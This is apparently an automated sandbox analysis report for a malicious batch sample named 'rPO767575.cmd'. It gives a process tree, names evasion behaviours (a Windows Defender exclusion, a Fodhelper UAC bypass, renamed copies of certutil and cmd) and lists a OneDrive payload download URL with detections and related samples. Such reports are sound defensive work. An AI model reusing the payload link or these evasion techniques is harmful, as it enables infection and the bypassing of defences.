          • cmd.exe (started)
            Signatures: Drops executables to the windows directory (C:\Windows) and starts them; Adds a directory exclusion to Windows Defender
            • alpha.exe (started)
              Signatures: Adds a directory exclusion to Windows Defender
              • xkn.exe (started)
                Signatures: Powershell is started from unusual location (likely to bypass HIPS); Adds a directory exclusion to Windows Defender; Reads the Security eventlog; Reads the System eventlog
                • alpha.exe (started)
                  Signatures: Adds a directory exclusion to Windows Defender
                  • ger.exe (started)
                    Signatures: UAC bypass detected (Fodhelper)
            • Ping_c.pif (started)
              Network: dual-spov-0006.spov-msedge.net 13.107.137.11, 443, 49707, 49708, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States
              Signatures: Antivirus detection for dropped file; Detected unpacking (creates a PE file in dynamic memory); Machine Learning detection for dropped file; 3 other signatures
            • extrac32.exe (started)
              Dropped: C:\Users\Public\alpha.exe, PE32+
              Signatures: Drops PE files to the user root directory; Drops or copies certutil.exe with a different name (likely to bypass HIPS); Drops or copies cmd.exe with a different name (likely to bypass HIPS)
            • 19 other processes
              • kn.exe (started)
                Signatures: Registers a new ROOT certificate; Drops PE files with a suspicious file extension
              • kn.exe (started)
                Dropped: C:\Users\Public\Libraries\Ping_c.pif, PE32
              • extrac32.exe (started)
                Dropped: C:\Windows \System32\per.exe, PE32+
              • 4 other processes
                Dropped: C:\Users\Public\xkn.exe, PE32+; C:\Users\Public\kn.exe, PE32+; C:\Users\Public\ger.exe, PE32+
          • SystemSettingsAdminFlows.exe (started)

        Source | Detection | Scanner | Label | Link
        rPO767575.cmd | 50% | ReversingLabs | Script-BAT.Trojan.Remcos |
        rPO767575.cmd | 44% | Virustotal | | Browse

        Source | Detection | Scanner | Label | Link
        C:\Users\Public\Libraries\Ping_c.pif | 100% | Avira | TR/AD.Nekark.qzqtk |
        C:\Users\Public\Libraries\Ping_c.pif | 100% | Joe Sandbox ML | |
        C:\Users\Public\alpha.exe | 0% | ReversingLabs | |
        C:\Users\Public\ger.exe | 0% | ReversingLabs | |
        C:\Users\Public\kn.exe | 0% | ReversingLabs | |
        C:\Users\Public\xkn.exe | 0% | ReversingLabs | |
        C:\Windows \System32\per.exe | 3% | ReversingLabs | |
        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        dual-spov-0006.spov-msedge.net | 0% | Virustotal | | Browse
        onedrive.live.com | 1% | Virustotal | | Browse
        18.31.95.13.in-addr.arpa | 0% | Virustotal | | Browse
        183.59.114.20.in-addr.arpa | 1% | Virustotal | | Browse
        Source | Detection | Scanner | Label | Link
        https://aka.ms/pscore68 | 0% | URL Reputation | safe |
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
        https://login.microsoftonline.com/%s/oauth2/token | 0% | Avira URL Cloud | safe |
        https://login.microsoftonline.com/%s/oauth2/authorize | 0% | Avira URL Cloud | safe |
        https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP | 0% | Avira URL Cloud | safe |
        https://acctcdn.msftauth.net/ | 0% | Avira URL Cloud | safe |
        https://lgincdnmsftuswe2.azureedge.ne | 0% | Avira URL Cloud | safe |
        https://logincdn.msftauth.net | 0% | Avira URL Cloud | safe |
        https://acctcdn.m | 0% | Avira URL Cloud | safe |
        https://login.microsoftonline.com/%s/oauth2/token | 0% | Virustotal | | Browse
        https://lgincdnmsftuswe2.azureedge.ne | 0% | Virustotal | | Browse
        https://logincdn.msftauth.net/16.000.30359.3/images/favicon.ico | 0% | Avira URL Cloud | safe |
        https://onedrive.live.com/zfo | 0% | Avira URL Cloud | safe |
        https://aka.ms/pscore6 | 0% | Avira URL Cloud | safe |
        https://live.com/H | 0% | Avira URL Cloud | safe |
        https://acctcdn.msftauth.net/ | 0% | Virustotal | | Browse
        https://login.microsoftonline.com/%s/oauth2/authorize | 0% | Virustotal | | Browse
        https://logincdn.msftauth.net | 1% | Virustotal | | Browse
        https://lgincdnvzeuno.azureedgL | 0% | Avira URL Cloud | safe |
        https://live.com/L | 0% | Avira URL Cloud | safe |
        https://onedrive.live.com/fo | 0% | Avira URL Cloud | safe |
        https://logincdn.msftauth.net/16.000.30359.3/images/favicon.ico | 0% | Virustotal | | Browse
        https://acctcdn.msftauth.net | 0% | Avira URL Cloud | safe |
        https://live.com/H | 0% | Virustotal | | Browse
        https://enterpriseregistration.windows.net/EnrollmentServer/key/ | 0% | Avira URL Cloud | safe |
        https://logincdn.msftauth.net/ | 0% | Avira URL Cloud | safe |
        https://onedrive.live.com/ | 0% | Avira URL Cloud | safe |
        https://live.com/s | 0% | Avira URL Cloud | safe |
        https://onedrive.live.com/download?resid=1EA3E8EA0AAD572E%21216&authkey= | 0% | Avira URL Cloud | safe |
        https://enterpriseregistration.windows.net/EnrollmentServer/key/ | 0% | Virustotal | | Browse
        https://live.com/L | 0% | Virustotal | | Browse
        https://acctcdn.msftauth.net | 0% | Virustotal | | Browse
        https://live.com/4 | 0% | Avira URL Cloud | safe |
        https://logincdn.ms | 0% | Avira URL Cloud | safe |
        https://aka.ms/pscore6 | 0% | Virustotal | | Browse
        https://live.com/w | 0% | Avira URL Cloud | safe |
        https://live.com/:p | 0% | Avira URL Cloud | safe |
        https://logincdn.ms | 0% | Virustotal | | Browse
        https://live.com/s | 0% | Virustotal | | Browse
        https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah | 0% | Avira URL Cloud | safe |
        https://logincdn.msftauth.net/ | 1% | Virustotal | | Browse
        https://onedrive.live.com/ | 1% | Virustotal | | Browse
        https://live.com/4 | 0% | Virustotal | | Browse
        https://live.com/w | 0% | Virustotal | | Browse
        https://live.com/ | 0% | Avira URL Cloud | safe |
        https://onedrive.live.com/download?res=1EA3E8EA0AAD572E%21216&authkey= | 0% | Avira URL Cloud | safe |
        https://live.com/# | 0% | Avira URL Cloud | safe |
        https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc | 0% | Avira URL Cloud | safe |
        https://lgincdnvzeuno.azureed | 0% | Avira URL Cloud | safe |
        https://onedrive.live.com/No | 0% | Avira URL Cloud | safe |
        https://logincdn.msftauth.net/shared/5/js/login_en_wxGybS-mFhG0b0BcVHo8Cw2.js | 0% | Avira URL Cloud | safe |
        http://www.pmail.com | 0% | Avira URL Cloud | safe |
        https://%ws/%ws_%ws_%ws/service.svc/%ws | 0% | Avira URL Cloud | safe |
        https://enterpriseregistration.windows.net/EnrollmentServer/device/ | 0% | Avira URL Cloud | safe |
        https://onedrive.live.com/download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 | 0% | Avira URL Cloud | safe |
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        dual-spov-0006.spov-msedge.net | 13.107.137.11 | true | true | | unknown
        onedrive.live.com | unknown | unknown | true | | unknown
        18.31.95.13.in-addr.arpa | unknown | unknown | false | | unknown
        183.59.114.20.in-addr.arpa | unknown | unknown | false | | unknown
        Name | Malicious | Antivirus Detection | Reputation
        https://onedrive.live.com/download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 | true | Avira URL Cloud: safe | unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEPkn.exe, 00000009.00000002.1463535859.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1459705858.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000002.1516633974.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000000.1507474970.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.7.drfalse
        • Avira URL Cloud: safe
        unknown
        https://login.microsoftonline.com/%s/oauth2/authorizekn.exefalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://acctcdn.msftauth.net/Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://lgincdnmsftuswe2.azureedge.nePing_c.pif, 0000001F.00000003.2357978518.00000000007A8000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://login.microsoftonline.com/%s/oauth2/tokenkn.exefalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://acctcdn.mPing_c.pif, 0000001F.00000003.2012981796.00000000271ED000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://logincdn.msftauth.netPing_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpfalse
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://logincdn.msftauth.net/16.000.30359.3/images/favicon.icoPing_c.pif, 0000001F.00000003.1673627946.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2726741587.000000002723E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2460286645.000000002721E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2523723266.000000002723E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2727134039.000000002727A000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.0000000027222000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1793730015.00000000007E1000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2460371452.00000000271F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2177405424.0000000027222000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888837366.0000000027215000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1985735249.0000000027216000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2288971180.00000000271F9000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587882016.000000002721D000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2250753517.0000000027276000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2460286645.0000000027226000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2177405424.00000000271F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048402158.0000000027240000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.0000000027203000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587623073.000000002727A000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 
0000001F.00000003.2250753517.0000000027282000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2493024630.000000002723E000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://onedrive.live.com/zfoPing_c.pif, 0000001F.00000003.2020461089.00000000007B5000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://aka.ms/pscore6xkn.exe, 00000011.00000002.1501921672.00000223D54B3000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://live.com/HPing_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://lgincdnvzeuno.azureedgLPing_c.pif, 0000001F.00000003.1859829424.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1853005680.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://live.com/LPing_c.pif, 0000001F.00000003.2555257376.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587882016.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://onedrive.live.com/foPing_c.pif, 0000001F.00000003.1826725982.00000000007B5000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://acctcdn.msftauth.netPing_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://enterpriseregistration.windows.net/EnrollmentServer/key/kn.exefalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://logincdn.msftauth.net/Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpfalse
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://onedrive.live.com/Ping_c.pif, 0000001F.00000003.2394138435.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1953336418.00000000007B5000.00000004.00000020.00020000.00000000.sdmptrue
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://live.com/sPing_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://onedrive.live.com/download?resid=1EA3E8EA0AAD572E%21216&authkey=Ping_c.pif, 0000001F.00000003.2427549071.00000000007EE000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: safe
        unknown
        https://live.com/4Ping_c.pif, 0000001F.00000003.2555257376.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587882016.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://logincdn.msPing_c.pif, 0000001F.00000003.1888960239.00000000007EE000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://live.com/wPing_c.pif, 0000001F.00000003.2555257376.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587882016.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        https://live.com/:pPing_c.pif, 0000001F.00000003.1673627946.00000000007B5000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatahkn.exe, 00000009.00000002.1463535859.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1459705858.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000002.1516633974.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000000.1507474970.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.7.drfalse
        • Avira URL Cloud: safe
        unknown
        https://onedrive.live.com/download?res=1EA3E8EA0AAD572E%21216&authkey=Ping_c.pif, 0000001F.00000003.2177670138.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1889176943.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2049253919.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357978518.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2394138435.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706868174.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1673627946.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2459802215.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2523153256.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2216274021.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1793730015.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1922014929.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2427549071.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2288367402.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2020461089.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627952934.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2703452505.0000000000778000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2080476478.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1953336418.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 
0000001F.00000003.2492438082.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1826725982.0000000000798000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://live.com/Ping_c.pif, 0000001F.00000002.2726741587.000000002721D000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2555976408.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2555976408.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2662272349.00000000007B9000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://live.com/#Ping_c.pif, 0000001F.00000003.2587882016.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svckn.exefalse
        • Avira URL Cloud: safe
        unknown
        https://onedrive.live.com/NoPing_c.pif, 0000001F.00000003.2216274021.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2321332613.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2662272349.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1744531159.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2523153256.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2080476478.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2588420742.00000000007B5000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://aka.ms/pscore68xkn.exe, 00000011.00000002.1501921672.00000223D54FC000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://lgincdnvzeuno.azureedPing_c.pif, 0000001F.00000003.1882008954.0000000027219000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888765366.0000000027219000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namexkn.exe, 00000011.00000002.1501921672.00000223D552B000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        unknown
        https://logincdn.msftauth.net/shared/5/js/login_en_wxGybS-mFhG0b0BcVHo8Cw2.jsPing_c.pif, 0000001F.00000003.2177670138.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1889176943.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2727134039.0000000027286000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2049253919.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357978518.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1826526825.00000000271F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048402158.000000002721E000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1635151705.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2394138435.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1920846634.0000000027216000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587623073.0000000027286000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706868174.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1737658652.00000000007F9000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1673627946.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2288971180.0000000027226000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1859650606.00000000271F9000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706649495.00000000271F6000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2459802215.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1786740158.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 
0000001F.00000003.1633584244.0000000000803000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2321978307.000000002723A000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://www.pmail.comPing_c.pif, Ping_c.pif, 0000001F.00000002.2707007653.00000000021C2000.00000004.00001000.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2708904655.0000000002940000.00000040.00001000.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2727734958.000000007FC40000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        https://%ws/%ws_%ws_%ws/service.svc/%wskn.exefalse
        • Avira URL Cloud: safe
        unknown
        https://enterpriseregistration.windows.net/EnrollmentServer/device/kn.exefalse
        • Avira URL Cloud: safe
        unknown
        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
        13.107.137.11 | dual-spov-0006.spov-msedge.net | United States | | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1515085
        Start date and time:2024-09-21 16:21:06 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 9m 37s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:43
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:1
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:rPO767575.cmd
        Detection:MAL
        Classification:mal100.bank.troj.expl.evad.winCMD@65/25@6/1
        EGA Information:
        • Successful, ratio: 90%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 42
        • Number of non-executed functions: 229
        Cookbook Comments:
        • Found application associated with file extension: .cmd
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 20.190.159.2, 20.190.159.68, 20.190.159.64, 20.190.159.71, 20.190.159.23, 20.190.159.4, 20.190.159.73, 40.126.31.67, 184.28.90.27, 40.126.31.69, 20.190.159.75, 40.126.31.71, 20.190.159.0
        • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, cxcs.microsoft.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
        • Execution Graph export aborted for target xkn.exe, PID 6528 because it is empty
        • Not all processes were analyzed; the report is missing behavior information
        • Report creation exceeded maximum time and may have missing disassembly code information.
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtDeviceIoControlFile calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtReadVirtualMemory calls found.
        • Report size getting too big, too many NtSetInformationFile calls found.
        Time | Type | Description
        10:22:16 | API Interceptor | 34x Sleep call for process: Ping_c.pif modified
        Match: 13.107.137.11
        Associated Sample Name / URL | Detection | Threat Name | Context
        Payment Remittance Advice_000000202213.xlsb | malicious | Unknown | onedrive.live.com/download?cid=64F8294A00286885&resid=64F8294A00286885%21770&authkey=ABI3zrc6BsVUKxU
        Match: dual-spov-0006.spov-msedge.net
        Associated Sample Name / URL | Detection | Threat Name | Context
        https://1drv.ms/o/c/8d397705294be844/Ej05S04brJ5Gk0BP_zBxdzgB_4nKyGxS56LL4LZ9Pc6fmQ?e=3DjGg4 | malicious | HtmlDropper | 13.107.137.11
        https://bit.ly/3e7c84f1a590a3e6 | malicious | Unknown | 13.107.139.11
        i45qm2Cawa | malicious | Unknown | 13.107.137.11
        https://1drv.ms/o/c/14c2aef4e2cd9199/EjbyQwyIjfhEmiCpubnJGm8BRFF0427oUHOxk88uqC5T0Q?e=0lgh0x | malicious | Unknown | 13.107.139.11
        https://1drv.ms/b/c/7bab8803aa446446/EVRHiu8efYZAkD-YFD5xQmIBzT5hMnGkyiNpwrnOj-mH_g | malicious | HTMLPhisher | 13.107.139.11
        https://1drv.ms/o/s!BDwGtOL3Ob0ShF7R9UYMfic1EmBo?e=xcw67NPIpE-D6DjdNd9CDg&at=9 | malicious | HTMLPhisher | 13.107.139.11
        Ln3Yc2X66g.exe | malicious | DBatLoader | 13.107.139.11
        Factura de proforma.exe | malicious | DBatLoader, FormBook | 13.107.137.11
        Payment Details.exe | malicious | DBatLoader, FormBook | 13.107.137.11
        ESW31074TS510.exe | malicious | DBatLoader | 13.107.137.11
        Match: MICROSOFT-CORP-MSN-AS-BLOCKUS
        Associated Sample Name / URL | Detection | Threat Name | Context
        160eb3d41a49c24b1ba025424b781ddf3acb8979ffb90269b6a0f701be0c3dfa.25.xls | malicious | Unknown | 13.107.246.60
        160eb3d41a49c24b1ba025424b781ddf3acb8979ffb90269b6a0f701be0c3dfa.24.xls | malicious | Unknown | 13.107.246.60
        8zzBr1gT31.elf | malicious | Mirai | 22.112.76.125
        160eb3d41a49c24b1ba025424b781ddf3acb8979ffb90269b6a0f701be0c3dfa.23.xls | malicious | Unknown | 13.107.246.60
        GyFcTadTZv.elf | malicious | Mirai | 13.83.227.6
        iZP1hJhnmz.elf | malicious | Mirai | 22.204.62.58
        dAlxfXyNm7.elf | malicious | Mirai | 20.104.105.19
        05KN0c1P2J.elf | malicious | Mirai | 20.228.79.144
